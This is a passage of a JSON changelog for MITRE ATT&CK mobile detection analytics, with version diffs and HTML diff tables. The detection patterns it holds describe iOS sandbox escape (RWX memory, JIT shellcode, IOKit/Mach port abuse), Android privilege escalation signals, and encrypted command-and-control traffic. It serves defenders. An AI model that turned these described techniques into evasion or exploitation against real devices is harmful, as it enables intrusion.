                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to163__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to163__0\"><a href=\"#difflib_chg_to163__top\">t</a></td><td class=\"diff_header\" id=\"from163_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Mobile&nbsp;security&nbsp;products&nbsp;can&nbsp;potentially&nbsp;utilize&nbsp;device&nbsp;APIs</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to163__top\">t</a></td><td class=\"diff_header\" id=\"to163_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">From&nbsp;the&nbsp;defender\u2019s&nbsp;perspective,&nbsp;this&nbsp;strategy&nbsp;correlates&nbsp;si</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;to&nbsp;determine&nbsp;if&nbsp;a&nbsp;device&nbsp;has&nbsp;been&nbsp;rooted&nbsp;or&nbsp;jailbroken.&nbsp;App</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">gnals&nbsp;that&nbsp;a&nbsp;previously&nbsp;unprivileged&nbsp;Android&nbsp;app&nbsp;or&nbsp;process&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">lication&nbsp;vetting&nbsp;services&nbsp;could&nbsp;potentially&nbsp;determine&nbsp;if&nbsp;an&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">has&nbsp;gained&nbsp;higher&nbsp;privileges&nbsp;through&nbsp;exploitation&nbsp;rather&nbsp;tha</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">application&nbsp;contains&nbsp;code&nbsp;designed&nbsp;to&nbsp;exploit&nbsp;vulnerabilitie</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">n&nbsp;normal&nbsp;OS&nbsp;or&nbsp;MDM&nbsp;flows.&nbsp;&nbsp;Observable&nbsp;behaviors&nbsp;include:&nbsp;&nbsp;(1</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">s.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">)&nbsp;unprivileged&nbsp;app&nbsp;processes&nbsp;issuing&nbsp;sensitive&nbsp;syscalls&nbsp;or&nbsp;a</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ccessing&nbsp;privileged&nbsp;device&nbsp;interfaces,&nbsp;&nbsp;(2)&nbsp;bursts&nbsp;of&nbsp;SELinu</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">x&nbsp;denials&nbsp;followed&nbsp;by&nbsp;an&nbsp;unexpected&nbsp;domain&nbsp;or&nbsp;permission&nbsp;cha</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">nge,&nbsp;&nbsp;(3)&nbsp;creation&nbsp;of&nbsp;new&nbsp;processes&nbsp;running&nbsp;with&nbsp;system&nbsp;or&nbsp;r</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">oot&nbsp;UID&nbsp;whose&nbsp;lineage&nbsp;traces&nbsp;back&nbsp;to&nbsp;an&nbsp;app&nbsp;sandbox&nbsp;path,&nbsp;an</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">d&nbsp;&nbsp;(4)&nbsp;crashes&nbsp;or&nbsp;abnormal&nbsp;restarts&nbsp;of&nbsp;privileged&nbsp;system&nbsp;ser</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">vices&nbsp;followed&nbsp;shortly&nbsp;by&nbsp;a&nbsp;new&nbsp;connection&nbsp;or&nbsp;binder&nbsp;interac</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">tion&nbsp;from&nbsp;the&nbsp;same&nbsp;low-privileged&nbsp;app.&nbsp;The&nbsp;focus&nbsp;is&nbsp;on&nbsp;unusu</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">al&nbsp;privilege&nbsp;transitions,&nbsp;anomalous&nbsp;process&nbsp;ancestry,&nbsp;and&nbsp;OS</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;security&nbsp;policy&nbsp;violations,&nbsp;not&nbsp;on&nbsp;specific&nbsp;exploit&nbsp;binarie</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">s&nbsp;or&nbsp;CVE&nbsp;signatures.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--1076f33e-a959-49b8-97a3-2edf0360fae2",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-01-16 15:51:26.313000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0665#AN1759",
                            "external_id": "AN1759"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1759",
                    "description": "Correlates app sandbox escape attempts via unsigned binary execution, mmap memory permission changes (RWX), and sandbox profile violations. Detection chain includes app leveraging JIT/JSC to execute shellcode or triggering kernel exploit via crafted IOKit or Mach port abuse.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6",
                            "name": "iOS:unifiedlog",
                            "channel": "code signature validation failure / exec of invalidly-signed payload from sandboxed app"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962",
                            "name": "iOS:unifiedlog",
                            "channel": "mmap with PROT_EXEC and PROT_WRITE by sandboxed app"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "ExecutableHashAllowList",
                            "description": "Allowlist known benign unsigned binaries for reducing FP."
                        },
                        {
                            "field": "RWXThreshold",
                            "description": "Adjustable threshold for RWX page allocation frequency or size."
                        },
                        {
                            "field": "JITContextDetection",
                            "description": "May require tuning based on OS version and legitimate app usage (e.g., Safari JIT)."
                        }
                    ],
                    "x_mitre_platforms": [
                        "iOS"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"ExecutableHashAllowList\", \"description\": \"Allowlist known benign unsigned binaries for reducing FP.\"}, {\"field\": \"RWXThreshold\", \"description\": \"Adjustable threshold for RWX page allocation frequency or size.\"}, {\"field\": \"JITContextDetection\", \"description\": \"May require tuning based on OS version and legitimate app usage (e.g., Safari JIT).\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-01-16 15:51:26.313000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Correlates app sandbox escape attempts via unsigned binary execution, mmap memory permission changes (RWX), and sandbox profile violations. Detection chain includes app leveraging JIT/JSC to execute shellcode or triggering kernel exploit via crafted IOKit or Mach port abuse.\", \"old_value\": \"Mobile security products can potentially utilize device APIs to determine if a device has been rooted or jailbroken.\\nApplication vetting services could potentially determine if an application contains code designed to exploit vulnerabilities.\", \"diff\": \"--- \\n+++ \\n@@ -1,2 +1 @@\\n-Mobile security products can potentially utilize device APIs to determine if a device has been rooted or jailbroken.\\n-Application vetting services could potentially determine if an application contains code designed to exploit vulnerabilities.\\n+Correlates app sandbox escape attempts via unsigned binary execution, mmap memory permission changes (RWX), and sandbox profile violations. Detection chain includes app leveraging JIT/JSC to execute shellcode or triggering kernel exploit via crafted IOKit or Mach port abuse.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6\", \"name\": \"iOS:unifiedlog\", \"channel\": \"code signature validation failure / exec of invalidly-signed payload from sandboxed app\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6\", \"name\": \"Sensor Health\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962\", \"name\": \"iOS:unifiedlog\", \"channel\": \"mmap with PROT_EXEC and PROT_WRITE by sandboxed app\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to201__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to201__0\"><a href=\"#difflib_chg_to201__top\">t</a></td><td class=\"diff_header\" id=\"from201_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Mobile&nbsp;security&nbsp;products&nbsp;can&nbsp;potentially&nbsp;utilize&nbsp;device&nbsp;APIs</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to201__top\">t</a></td><td class=\"diff_header\" id=\"to201_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Correlates&nbsp;app&nbsp;sandbox&nbsp;escape&nbsp;attempts&nbsp;via&nbsp;unsigned&nbsp;binary&nbsp;e</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;to&nbsp;determine&nbsp;if&nbsp;a&nbsp;device&nbsp;has&nbsp;been&nbsp;rooted&nbsp;or&nbsp;jailbroken.&nbsp;App</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">xecution,&nbsp;mmap&nbsp;memory&nbsp;permission&nbsp;changes&nbsp;(RWX),&nbsp;and&nbsp;sandbox&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">lication&nbsp;vetting&nbsp;services&nbsp;could&nbsp;potentially&nbsp;determine&nbsp;if&nbsp;an&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">profile&nbsp;violations.&nbsp;Detection&nbsp;chain&nbsp;includes&nbsp;app&nbsp;leveraging&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">application&nbsp;contains&nbsp;code&nbsp;designed&nbsp;to&nbsp;exploit&nbsp;vulnerabilitie</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">JIT/JSC&nbsp;to&nbsp;execute&nbsp;shellcode&nbsp;or&nbsp;triggering&nbsp;kernel&nbsp;exploit&nbsp;vi</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">s.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">a&nbsp;crafted&nbsp;IOKit&nbsp;or&nbsp;Mach&nbsp;port&nbsp;abuse.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--1f3c9114-ac86-4c1f-bb64-fb94d65ac78c",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-06 15:51:25.896000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0667#AN1762",
                            "external_id": "AN1762"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1762",
                    "description": "An application generates, imports, or accesses asymmetric keypairs (e.g., RSA/ECC), uses a public key to encrypt outbound data or establish encrypted sessions, and transmits resulting ciphertext in structured communication patterns. Detection correlates keypair lifecycle activity + asymmetric crypto API usage + data transformation + background execution context + network transmission, especially when inconsistent with expected application functionality.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "App invokes asymmetric cryptographic operations (e.g., RSA/ECC keypair generation OR public key encryption OR signature operations) on outbound data buffers"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "Keypair generation, import, or access events (public/private key usage) occurring prior to network communication"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
                            "name": "MobileEDR:telemetry",
                            "channel": "App writes asymmetric-encrypted blobs or encoded ciphertext to local buffers or files prior to transmission"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "Asymmetric crypto operations occur while app_state=background OR device_locked=true OR no recent user interaction"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
                            "channel": "App not in approved cryptographic or secure communication category performing keypair + encryption + transmission behavior"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window between keypair usage and outbound communication"
                        },
                        {
                            "field": "AllowedCryptoApps",
                            "description": "Apps expected to use asymmetric cryptography (e.g., secure messaging, VPN, enterprise auth apps)"
                        },
                        {
                            "field": "ForegroundStateRequired",
                            "description": "Whether key generation/encryption should occur only during user interaction"
                        },
                        {
                            "field": "KeyGenerationThreshold",
                            "description": "Frequency of keypair generation/import events considered anomalous"
                        },
                        {
                            "field": "PayloadSizeVariance",
                            "description": "Expected variability in payload sizes due to asymmetric encryption overhead"
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_log_source_references']\": [{\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"App invokes asymmetric cryptographic operations (e.g., RSA/ECC keypair generation OR public key encryption OR signature operations) on outbound data buffers\"}, {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Keypair generation, import, or access events (public/private key usage) occurring prior to network communication\"}, {\"x_mitre_data_component_ref\": \"x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"App writes asymmetric-encrypted blobs or encoded ciphertext to local buffers or files prior to transmission\"}, {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Asymmetric crypto operations occur while app_state=background OR device_locked=true OR no recent user interaction\"}, {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"App not in approved cryptographic or secure communication category performing keypair + encryption + transmission behavior\"}], \"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window between keypair usage and outbound communication\"}, {\"field\": \"AllowedCryptoApps\", \"description\": \"Apps expected to use asymmetric cryptography (e.g., secure messaging, VPN, enterprise auth apps)\"}, {\"field\": \"ForegroundStateRequired\", \"description\": \"Whether key generation/encryption should occur only during user interaction\"}, {\"field\": \"KeyGenerationThreshold\", \"description\": \"Frequency of keypair generation/import events considered anomalous\"}, {\"field\": \"PayloadSizeVariance\", \"description\": \"Expected variability in payload sizes due to asymmetric encryption overhead\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-06 15:51:25.896000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"An application generates, imports, or accesses asymmetric keypairs (e.g., RSA/ECC), uses a public key to encrypt outbound data or establish encrypted sessions, and transmits resulting ciphertext in structured communication patterns. Detection correlates keypair lifecycle activity + asymmetric crypto API usage + data transformation + background execution context + network transmission, especially when inconsistent with expected application functionality.\", \"old_value\": \"Since data encryption is a common practice in many legitimate applications and uses standard programming language-specific APIs, encrypting data for command and control communication is regarded as undetectable to the user.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to187__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to187__0\"><a href=\"#difflib_chg_to187__top\">t</a></td><td class=\"diff_header\" id=\"from187_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Since&nbsp;data&nbsp;encryption&nbsp;is&nbsp;a&nbsp;common&nbsp;practice&nbsp;in&nbsp;many&nbsp;legitimat</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to187__top\">t</a></td><td class=\"diff_header\" id=\"to187_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">An&nbsp;application&nbsp;generates,&nbsp;imports,&nbsp;or&nbsp;accesses&nbsp;asymmetric&nbsp;ke</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">e&nbsp;applications&nbsp;and&nbsp;uses&nbsp;standard&nbsp;programming&nbsp;language-specif</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ypairs&nbsp;(e.g.,&nbsp;RSA/ECC),&nbsp;uses&nbsp;a&nbsp;public&nbsp;key&nbsp;to&nbsp;encrypt&nbsp;outboun</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ic&nbsp;APIs,&nbsp;encrypting&nbsp;data&nbsp;for&nbsp;command&nbsp;and&nbsp;control&nbsp;communicati</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">d&nbsp;data&nbsp;or&nbsp;establish&nbsp;encrypted&nbsp;sessions,&nbsp;and&nbsp;transmits&nbsp;result</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">on&nbsp;is&nbsp;regarded&nbsp;as&nbsp;undetectable&nbsp;to&nbsp;the&nbsp;user.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ing&nbsp;ciphertext&nbsp;in&nbsp;structured&nbsp;communication&nbsp;patterns.&nbsp;Detecti</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">on&nbsp;correlates&nbsp;keypair&nbsp;lifecycle&nbsp;activity&nbsp;+&nbsp;asymmetric&nbsp;crypto</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;API&nbsp;usage&nbsp;+&nbsp;data&nbsp;transformation&nbsp;+&nbsp;background&nbsp;execution&nbsp;cont</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ext&nbsp;+&nbsp;network&nbsp;transmission,&nbsp;especially&nbsp;when&nbsp;inconsistent&nbsp;wit</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">h&nbsp;expected&nbsp;application&nbsp;functionality.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--4b4a369c-35aa-4389-a218-2034fb043041",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-06 15:53:14.197000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0667#AN1763",
                            "external_id": "AN1763"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1763",
                    "description": "Indirect evidence of asymmetric cryptographic channel usage inferred through key exchange-like network patterns and application background execution behavior, where direct observation of keypair operations is limited. Detection correlates app entitlement posture + background execution + asymmetric handshake patterns + subsequent encrypted communication.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window between initial communication burst and steady encrypted traffic"
                        },
                        {
                            "field": "AllowedAppList",
                            "description": "Apps expected to perform asymmetric key exchanges"
                        },
                        {
                            "field": "HandshakePatternThreshold",
                            "description": "Threshold for identifying asymmetric handshake-like traffic patterns"
                        },
                        {
                            "field": "ForegroundStateRequired",
                            "description": "Whether communication establishment should occur during user interaction"
                        }
                    ],
                    "x_mitre_platforms": [
                        "iOS"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window between initial communication burst and steady encrypted traffic\"}, {\"field\": \"AllowedAppList\", \"description\": \"Apps expected to perform asymmetric key exchanges\"}, {\"field\": \"HandshakePatternThreshold\", \"description\": \"Threshold for identifying asymmetric handshake-like traffic patterns\"}, {\"field\": \"ForegroundStateRequired\", \"description\": \"Whether communication establishment should occur during user interaction\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-06 15:53:14.197000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Indirect evidence of asymmetric cryptographic channel usage inferred through key exchange-like network patterns and application background execution behavior, where direct observation of keypair operations is limited. Detection correlates app entitlement posture + background execution + asymmetric handshake patterns + subsequent encrypted communication.\", \"old_value\": \"Since data encryption is a common practice in many legitimate applications and uses standard programming language-specific APIs, encrypting data for command and control communication is regarded as undetectable to the user.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to184__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to184__0\"><a href=\"#difflib_chg_to184__top\">t</a></td><td class=\"diff_header\" id=\"from184_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Since&nbsp;data&nbsp;encryption&nbsp;is&nbsp;a&nbsp;common&nbsp;practice&nbsp;in&nbsp;many&nbsp;legitimat</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to184__top\">t</a></td><td class=\"diff_header\" id=\"to184_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Indirect&nbsp;evidence&nbsp;of&nbsp;asymmetric&nbsp;cryptographic&nbsp;channel&nbsp;usage&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">e&nbsp;applications&nbsp;and&nbsp;uses&nbsp;standard&nbsp;programming&nbsp;language-specif</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">inferred&nbsp;through&nbsp;key&nbsp;exchange-like&nbsp;network&nbsp;patterns&nbsp;and&nbsp;appl</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ic&nbsp;APIs,&nbsp;encrypting&nbsp;data&nbsp;for&nbsp;command&nbsp;and&nbsp;control&nbsp;communicati</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span 